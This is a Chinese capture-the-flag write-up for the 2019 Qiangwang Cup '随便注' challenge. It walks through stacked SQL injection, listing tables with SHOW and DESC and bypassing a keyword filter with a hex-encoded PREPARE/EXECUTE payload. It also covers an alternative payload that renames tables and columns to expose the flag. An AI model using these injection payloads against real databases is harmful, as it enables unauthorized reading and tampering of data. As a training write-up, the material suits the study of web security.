当前位置:网站首页>强网杯 2019 随便注
强网杯 2019 随便注
2022-04-22 06:19:00 【Misaka10046】
首先尝试直接去注入,发现好像并没有什么用

尝试使用union盲注,preg_match() 函数可以根据正则表达式对字符串进行搜索匹配,发现全被禁了,所以排除union注入

使用show,发现可以查看表名

使用desc指令分别去查看这两个表结构的详细信息,这里1919810931114514这个表名必须要使用括起来。


因为发现这里过滤了很多函数,因此考虑怎么去绕过。
这里采用了预处理的语句。先把 select * from ` 1919810931114514 `,通过16进制编码变成一串数字

然后使用prepare from 预编译函数,这个函数会自动把16进制字符串转换为 SQL语句,在通过execute执行预编译的SQL语句。0';SET @a=0x73656C656374202A2066726F6D20603139313938313039333131313435313460;prepare m_string from @a;execute m_string;#

看网上还有其他的方法,比如修改表名列名。
先把words改成其他表名,再把1919810931114514改名为words,给新words添加新列名id,再把flag改名为data。
1';
rename table words to word1;
rename table `1919810931114514` to words;//改表名
alert table words add id int unsigned not Null auto_increment primary key ;//添加一个自增的ID
alert table words change flag data varchar(100); # //改列名
版权声明
本文为[Misaka10046]所创,转载请带上原文链接,感谢
https://blog.csdn.net/Misaka10046/article/details/118474233
边栏推荐
- Can the following SQL optimize query performance with index
- 2019.1.2 idea usage tutorial
- 384 · longest substring without repeated characters
- Codeforces Round #778
- 189. Rotation array
- 867 · four key keyboard
- Leetcode - 3 - (string addition, maximum number of consecutive 1 < Ⅰ Ⅲ >, maximum difficulty of the exam, deletion of the penultimate node of the linked list)
- Change DP (ah ah ah)
- Codeforces Round #774 (Div. 2)
- Blog synchronization update notification
猜你喜欢

L2-004 这是二叉搜索树吗?(先序输入&判断搜索二叉树&后序输出)

L2-005 集合相似度(set判重)

Leetcode - 4 - (longest substring without repeated characters, candy distribution, binary tree traversal)

278 · draw fill

L1-071 前世档案 (20 分) (类似二分)

通过驱动断链来隐藏驱动

B. Cutting corners (simple geometry / sign in) (Game 5 of 2021 Training Alliance warm-up training competition)

D. Determine the Photo Position (简单找子串)(2021牛客暑期多校训练营1)

LeetCode - 6 - (字符串相乘、下一個更大元素<ⅠⅡⅢ>、k個一組翻轉鏈錶)

A.Binary Seating (概率) (2021年度训练联盟热身训练赛第五场)
随机推荐
437. Path sum III
B. Cutting corners (simple geometry / sign in) (Game 5 of 2021 Training Alliance warm-up training competition)
Internal class instructions (static, instance, local)
Codeforces Round #634 (Div. 3)
This关键字详细概述
L1-071 前世档案 (20 分) (类似二分)
Final keyword
If I make this silly mistake again/ (ㄒoㄒ)/~~
1. Jam packed (Game 5 of 2021 training League warm-up training competition)
119 · 编辑距离
Educational Codeforces Round 122 (Rated for Div. 2)
119 · edit distance
Quick sort and merge sort
Minimum circle coverage (basis of computational geometry)
L2-002 linked list weight removal (pit of test point 1)
Kotlin Flow实现线程切换
Links summary qwq
The art of concurrent programming (9): the use and principle of final
L2-004 这是二叉搜索树吗?(先序输入&判断搜索二叉树&后序输出)
Ansible的使用